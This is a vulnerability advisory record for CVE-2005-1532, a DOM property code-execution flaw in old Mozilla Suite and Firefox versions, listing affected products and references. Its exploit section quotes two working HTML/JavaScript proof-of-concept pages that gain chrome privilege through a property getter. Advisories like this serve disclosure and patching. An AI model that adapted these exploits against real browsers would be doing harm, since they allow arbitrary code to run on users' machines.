Mozilla Suite and Firefox DOM Property Code Execution Vulnerability

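Vulnerability ID: 1108788
Vulnerability type: Permissions, privileges, and access control
Published: 2005-05-16
Updated: 2007-03-02
CVE ID: CVE-2005-1532
CNNVD-ID: CNNVD-200505-994
Platform: Multiple
CVSS score: 7.5
|Vulnerability sources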
https://www.exploit-db.com/exploits/25670
https://www.securityfocus.com/bid/13645
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-994
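|Vulnerability details
Mozilla Suite and Firefox are both very popular open-source web browsers. Mozilla Suite and Mozilla Firefox are affected by a code-execution vulnerability. The cause is that the application does not properly validate Document Object Model (DOM) property values. An attacker can exploit this vulnerability to execute arbitrary code with the privileges of the user who launched the vulnerable web browser. This vulnerability is a variant of the one described in MFSA 2005-41.
|Exploit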
source: http://www.securityfocus.com/bid/13645/info

Mozilla Suite and Mozilla Firefox are affected by a code-execution vulnerability. This issue is due to a failure in the application to properly verify Document Object Model (DOM) property values.

An attacker may leverage this issue to execute arbitrary code with the privileges of the user that activated the vulnerable browser, ultimately facilitating a compromise of the affected computer.

This issue is reportedly a variant of BID 13233. Further details are scheduled to be released in the future; this BID will be updated accordingly.

<html>
<head>
<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title> 
<body>
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);
})();

document.body.__defineGetter__("type", function() {
return { toString : script };
});

var event = document.createEvent("Events");
event.initEvent("PluginNotFound", true, true);
document.body.dispatchEvent(event);
</script>
</body>

-----------------------------------------------------------------------------------------

<html>
<head>
<title>Proof-of-Concept for Mozilla 1.7.7 - by moz_bug_r_a4</title> 
<body>

<div id="d"></div>
<pre>
Click on the red box.
</pre>

<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);
})();

var xulns = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
var node = document.createElementNS(xulns, "input");

node.__defineGetter__("type", function() {
return { toString : script };
});

node.style.width = "100px";
node.style.height = "100px";
node.style.backgroundColor = "#f00";
document.getElementById("d").appendChild(node);
</script>
</body>
|Affected products
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4
|References

Source: VUPEN
Name: ADV-2005-0530
Link: http://www.frsirt.com/english/advisories/2005/0530
Source: BID
Name: 15495
Link: http://www.securityfocus.com/bid/15495
Source: BID
Name: 13645
Link: http://www.securityfocus.com/bid/13645
Source: REDHAT
Name: RHSA-2005:601
Link: http://www.redhat.com/support/errata/RHSA-2005-601.html
Source: REDHAT
Name: RHSA-2005:435
Link: http://www.redhat.com/support/errata/RHSA-2005-435.html
Source: REDHAT
Name: RHSA-2005:434
Link: http://www.redhat.com/support/errata/RHSA-2005-434.html
Source: SUSE
Name: SUSE-SA:2006:022
Link: http://www.novell.com/linux/security/advisories/2006_04_25.html
Source: www.mozilla.org
Link: http://www.mozilla.org/security/announce/mfsa2005-44.html
Source: SECTRACK
Name: 1013965
Link: http://securitytracker.com/id?1013965
Source: SECTRACK
Name: 1013964
Link: http://securitytracker.com/id?1013964
Source: SECUNIA
Name: 19823
Link: http://secunia.com/advisories/19823
Source: SCO
Name: SCOSA-2005.49
Link: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt
Source: USGovernmentResource:oval:org.mitre.oval:def:100014
Name: oval:org.mitre.oval:def:1